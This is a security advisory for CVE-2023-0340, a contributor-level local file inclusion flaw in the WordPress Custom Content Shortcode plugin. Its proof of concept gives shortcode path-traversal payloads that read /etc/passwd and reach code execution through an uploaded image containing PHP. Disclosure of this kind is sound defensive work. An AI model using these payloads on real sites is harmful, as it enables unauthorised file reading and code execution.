Custom Content Shortcode <= 4.0.2 – Contributor+ LFI | CVE 2023-0340

Description

The plugin does not validate one of its shortcode attribute, which could allow users with a contributor role and above to include arbitrary files via a traversal attack. This could also allow them to read non PHP files and retrieve their content. RCE could also be achieved if the attacker manage to upload a malicious image containing PHP code, and then include it via the affected attribute, on a default WP install, authors could easily achieve that given that they have the upload_file capability.

Proof of Concept

As a contributor, put the shortcode below in a post and preview it

[comment template="/../../../license.txt"]

Assuming the blog is at /var/www/wordpress/, /etc/passwd can be accessed with

[comment template="/../../../../../../etc/passwd"]

If the attacker can upload any file, such as an image containing PHP code in the comment, RCE could be achieved, example (by default, author and above can upload files):

[comment template="/../../../wp-content/uploads/2023/01/malicious.jpg"]